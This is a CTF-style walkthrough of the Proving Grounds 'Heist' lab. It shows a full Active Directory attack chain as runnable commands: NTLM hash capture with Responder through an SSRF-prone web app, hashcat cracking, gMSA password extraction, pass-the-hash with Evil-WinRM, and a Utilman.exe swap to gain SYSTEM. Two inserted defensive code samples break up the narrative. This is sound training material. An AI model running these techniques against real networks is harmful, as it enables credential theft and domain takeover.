PG - Heist

In this walkthrough, we will be going through the Heist room from Proving Grounds. The room is rated Hard on the platform. It involves capturing a user's NTLM hash through an insecure web browser application, moving laterally by extracting a gMSA password, and finally getting Admin by abusing SeRestorePrivilege. So, let's get started without any delay.

Machine Info:

Title: Heist
IP address: 192.168.153.165
Difficulty: Hard
OS: Windows
Description: Heist is a Hard Windows machine that involves capturing a user's NTLM hash through an insecure web browser application, moving laterally by extracting a gMSA password, and finally getting Admin by abusing SeRestorePrivilege.

Enumeration:

  • I started off with an aggressive nmap scan and a full TCP port scan. Several ports were open: 88 (Kerberos), 139 and 445 (SMB), 3268 (LDAP), 8080 (HTTP) and many more.

$ sudo nmap -A 192.168.153.165
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-12 13:05 IST

Nmap scan report for 192.168.153.165
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-12 07:36:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HEIST
|   NetBIOS_Domain_Name: HEIST
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: heist.offsec
|   DNS_Computer_Name: DC01.heist.offsec
|   DNS_Tree_Name: heist.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-02-12T07:36:26+00:00
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2023-11-14T05:10:15
|_Not valid after:  2024-05-15T05:10:15
|_ssl-date: 2024-02-12T07:37:04+00:00; 0s from scanner time.
8080/tcp open  http          Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-02-12T07:36:27
|_  start_date: N/A

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   211.36 ms 192.168.45.1
2   211.36 ms 192.168.45.254
3   211.38 ms 192.168.251.1
4   211.39 ms 192.168.153.165

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.01 seconds

nmap scan

sudo nmap -sS -p- -T5 192.168.153.165

all ports scan

  • Added the domain to my /etc/hosts file.

adding domain in /etc/hosts file

  • Enumerated the SMB shares using smbclient and smbmap with a null session but found nothing.

smbclient -L 192.168.153.165

smbmap -H 192.168.153.165

SMB Enumeration

  • Next, I enumerated the web server on port 8080 and found an application running. It asks for a URL and connects to it, simulating a browser.

Secure Web Browser

  • I performed a test run to see whether it would connect to my netcat listener on port 1234 and, surprisingly, it did.

Entering our IP address

getting connection on netcat listener
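The application will connect to any host it is handed, which is the whole problem: a server-side fetcher that follows arbitrary URLs will happily answer an NTLM challenge from a stranger. As an added example (not the challenge application's code), this is the validation such a fetcher should perform before opening a socket; the allowlisted DNS suffix and subnet are assumptions standing in for a real deployment, and the resolver is injectable so the check runs offline.

```python
"""Target validation for a server-side URL fetcher such as the "Super Secure Web
Browser" on port 8080. Added example, not the challenge's code: the allowlisted
DNS suffix and network are assumptions standing in for a real deployment."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_SUFFIX = ".heist.offsec"                                # assumption: internal sites only
ALLOWED_NETWORKS = [ipaddress.ip_network("192.168.153.0/24")]  # assumption: server subnet

class UnsafeTarget(ValueError):
    """Raised before any socket is opened, so no NTLM challenge can ever be answered."""

def resolve_all(host):
    """Default resolver: every address the name currently maps to."""
    return {ai[4][0] for ai in socket.getaddrinfo(host, None)}

def validate_fetch_target(url, resolver=resolve_all):
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeTarget(f"scheme {parts.scheme!r} not allowed")
    if parts.username or parts.password:
        raise UnsafeTarget("credentials embedded in URL")
    host = parts.hostname
    if not host:
        raise UnsafeTarget("missing host")
    try:                             # an IP literal, like the listener in the write-up,
        ipaddress.ip_address(host)   # can never be an allowlisted internal name
        is_literal = True
    except ValueError:
        is_literal = False
    if is_literal or not host.lower().endswith(ALLOWED_SUFFIX):
        raise UnsafeTarget(f"host {host!r} is not on the allowlist")
    # Re-check what the name resolves to: a hijacked or rebinding record must not
    # steer the fetcher (and the credentials of the account running it) off-subnet.
    for addr in resolver(host):
        ip = ipaddress.ip_address(addr)
        if not any(ip in net for net in ALLOWED_NETWORKS):
            raise UnsafeTarget(f"{host} resolves to {addr}, outside the allowed networks")
    return parts.geturl()
```

Pair this with running the fetcher under an account that holds no domain privileges, so that even a bypass yields nothing worth replaying.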

Initial Access:

  • Next, I set up Responder to capture any incoming NTLM hashes.

sudo python3 Responder.py -I tun1

Responder setup

  • Entered the Responder listener IP in the search bar and voila! We captured the hash successfully.

Entering Responder IP address

got enox hash

enox::HEIST:4ee71732f6a10973:C8875307B633924F6098A71D34AD36E5:01010000000000006BBF0DAF895DDA014ACB3BD3098CC21300000000020008004B0050003500540001001E00570049004E002D00550054004B004F0036004F004F005700340052004D00040014004B005000350054002E004C004F00430041004C0003003400570049004E002D00550054004B004F0036004F004F005700340052004D002E004B005000350054002E004C004F00430041004C00050014004B005000350054002E004C004F00430041004C0008003000300000000000000000000000003000002184FB7FA927C34729731C2A223CA1542BCB740A2C3C6CB8F29853E2F03C2D9C0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003100390036000000000000000000
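The captured line carries more than the material hashcat needs: the blob after the NTProofStr is the client's NTLMv2_CLIENT_CHALLENGE, whose AV_PAIRs record where the client believed it was authenticating and whether the channel was bound to TLS. The parser below is an added example (not part of this write-up or of Responder) that decodes the line shown above; the expected DNS suffix passed to triage() is an assumption.

```python
"""Decode the metadata inside a Net-NTLMv2 capture (hashcat 5600 line format).
Added example, not from the write-up or Responder; blob layout per MS-NLMP
NTLMv2_CLIENT_CHALLENGE / AV_PAIR. The sample line is the capture shown above."""
import ipaddress
import struct
from datetime import datetime, timedelta, timezone

CAPTURED_LINE = "enox::HEIST:4ee71732f6a10973:C8875307B633924F6098A71D34AD36E5:01010000000000006BBF0DAF895DDA014ACB3BD3098CC21300000000020008004B0050003500540001001E00570049004E002D00550054004B004F0036004F004F005700340052004D00040014004B005000350054002E004C004F00430041004C0003003400570049004E002D00550054004B004F0036004F004F005700340052004D002E004B005000350054002E004C004F00430041004C00050014004B005000350054002E004C004F00430041004C0008003000300000000000000000000000003000002184FB7FA927C34729731C2A223CA1542BCB740A2C3C6CB8F29853E2F03C2D9C0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003100390036000000000000000000"

# MS-NLMP AvId values; ids 1-5 and 9 carry UTF-16LE strings
AV_NAMES = {1: "nb_computer", 2: "nb_domain", 3: "dns_computer", 4: "dns_domain",
            5: "dns_tree", 6: "flags", 7: "timestamp", 8: "single_host",
            9: "target_name", 10: "channel_bindings"}
STRING_AVS = {1, 2, 3, 4, 5, 9}

def filetime_to_datetime(ft):  # 100 ns ticks since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_netntlmv2(line):
    user, _, domain, server_chal, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":  # RespType / HiRespType of an NTLMv2 blob
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    (filetime,) = struct.unpack_from("<Q", blob, 8)  # client timestamp at offset 8
    info = {"user": user, "domain": domain, "server_challenge": server_chal,
            "nt_proof": nt_proof, "client_challenge": blob[16:24].hex(),
            "timestamp": filetime_to_datetime(filetime), "av_pairs": {}}
    off = 28  # AV_PAIR list follows the 4-byte Reserved3 field
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        value = blob[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, f"av_{av_id}")
        info["av_pairs"][name] = value.decode("utf-16-le") if av_id in STRING_AVS else value.hex()
    return info

def triage(info, expected_dns_suffix):
    # Analyst flags: where did the client send its response, and was the channel bound?
    av, notes = info["av_pairs"], []
    target = av.get("target_name", "")  # MsvAvTargetName: the SPN the client built
    host = target.split("/", 1)[1] if "/" in target else target
    if host:
        try:
            ipaddress.ip_address(host)
            notes.append(f"authenticated to {target}: an IP literal, not a domain host")
        except ValueError:
            if not host.lower().endswith(expected_dns_suffix.lower()):
                notes.append(f"authenticated to {target}, outside {expected_dns_suffix}")
    if "channel_bindings" in av and set(av["channel_bindings"]) <= {"0"}:
        notes.append("channel bindings all zero: plaintext HTTP, nothing for EPA to check")
    return notes
```

On this capture the NetBIOS and DNS names come from Responder's fabricated challenge, while MsvAvTargetName shows the client built an SPN for HTTP/192.168.45.196, a bare IP outside heist.offsec, with empty channel bindings.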

  • Moving on, I cracked the captured hash (NetNTLMv2, hashcat mode 5600) with the command below and got the password for user enox.

hashcat -m 5600 enox.hash ~/Desktop/Wordlist/rockyou.txt --force

cracked enox password with hashcat

  • I took the user's password and sprayed it against the machine to gather a list of users on the domain.

crackmapexec smb 192.168.153.165 -u enox -p california --users

enumerating user with crackmapexec

  • Next, I tried to get a shell with Evil-WinRM using the user's creds but was unable to do so at the moment, for some reason.

evil-winrm.rb -i 192.168.153.165 -u enox -p california

not got shell access

  • Moving further with my enumeration, I listed the shares accessible to user enox but found nothing interesting here either.

crackmapexec smb 192.168.153.165 -u enox -p california --shares

Enumerating shares with crackmapexec

  • Next, I used the BloodHound Python ingestor to gather information about the domain.

$ bloodhound-python -c all -u enox -p 'california' -d heist.offsec -gc heist.offsec -dc DC01.heist.offsec
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.heist.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.heist.offsec
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.heist.offsec
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 49S

enumerating with bloodhound-python

  • Checked for any saved creds in the user descriptions but found none.

cat 20240212140131_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r

looking for saved creds in description

  • Next, I checked the enox user's WinRM access again and now it showed a green flag. Accessed it with Evil-WinRM and I was able to get in. Strange!

crackmapexec winrm 192.168.153.165 -u enox -p california

Got Pwned in CME

got access as enox

  • Captured the local flag from our user's Desktop.

local flag

Lateral Movement (Enox to svc_apache):

  • I peeked inside the todo file on the enox Desktop and found that the target application is to be migrated to Apache.

cat todo.txt

  • Checked the information about our user enox and found that he is part of the "Web Admins" group.

net user enox

  • Uploaded the data collected earlier to BloodHound to visualise the AD environment we are dealing with here. Running the query "Shortest path to Domain Admins" reveals the map below. As per the map, since we are part of the Web Admins group we are able to read the gMSA password of SVC_APACHE and get its hash.

Shortest path to Domain Admins

  • We can check which service accounts are gMSAs using the command below.

Get-ADServiceAccount -Filter * | Where-Object {$_.ObjectClass -eq "msDS-GroupManagedServiceAccount"}

checking the part of GMSA

gMSA Extraction

  • We will now use the tool below to read the gMSA password and derive the account's hashes from it.

Tools: https://github.com/expl0itabl3/Toolies

upload /home/wh1terose/CTF/PG-Play/machines/Heist/GMSAPasswordReader.exe .

extract the hashes via gMSA

*Evil-WinRM* PS C:\Users\enox\Documents> . ./GMSAPasswordReader.exe --AccountName 'svc_apache'
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 83AC7FECFBF44780E3AAF5D04DD368A5
[*]       aes128_cts_hmac_sha1 : 08E643C43F775FAC782EDBB04DD40541
[*]       aes256_cts_hmac_sha1 : 588C2BB865E771ECAADCB48ECCF4BCBCD421BF329B0133A213C83086F1A2E3D7
[*]       des_cbc_md5          : 9E340723700454E9

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 0AFF0D9DFA8B436E6688697B0A47B50C
[*]       aes128_cts_hmac_sha1 : C958BEE96DEE78F9035F460B91EC6D86
[*]       aes256_cts_hmac_sha1 : D3C18DAF21128CAFEAECE5BFF6599A0A4DFB2E9BE22F6CFE13677688B0A34988
[*]       des_cbc_md5          : 0804169DCECB6102

GMSAPasswordReader.exe

  • Once we have the svc_apache hash from the output above (the current rc4_hmac value is the NT hash), we can pass the hash with Evil-WinRM to get a shell as user svc_apache$.

evil-winrm.rb -i 192.168.153.165 -u svc_apache$ -H "0AFF0D9DFA8B436E6688697B0A47B50C"

got access as svc_apache

Privilege Escalation:

  • Next, we checked all the information and privileges of our current user. As per the result, our current user has SeRestorePrivilege set.

whoami /all

SeRestorePrivilege Abuse

  • Because SeRestorePrivilege bypasses file ACLs for write operations, we can abuse it by moving the real Utilman.exe aside, renaming cmd.exe to Utilman.exe and then triggering it from the RDP login screen to get a shell as Administrator.

Resource: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

cd C:\Windows\system32

dir

Utilman.exe

ren Utilman.exe Utilman.old

ren cmd.exe Utilman.exe

  • Once done with the setup, use the rdesktop utility to spawn an RDP session on the target.

rdesktop 192.168.153.165

  • Lock the console and press Win+U. This will give us a command shell as Administrator.

got root

  • Captured the root flag and completed the machine.

proof flag

Conclusion:

So that was Heist for you. We started off with a regular nmap scan and found several open ports: 88 (Kerberos), 139 and 445 (SMB), 3268 (LDAP), 8080 (HTTP) and many more. Enumerated the web server on port 8080 and found a Secure Web Browser application. Used Responder to capture the NTLM hash of user enox, then cracked the hash with hashcat and used the password to get initial shell access as enox. Enumerated the groups enox belongs to and found the Web Admins group, which can read the gMSA password of SVC_APACHE and so obtain its hash. Used that hash to get access as user svc_apache. At last, abused SeRestorePrivilege to get root on the system. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".
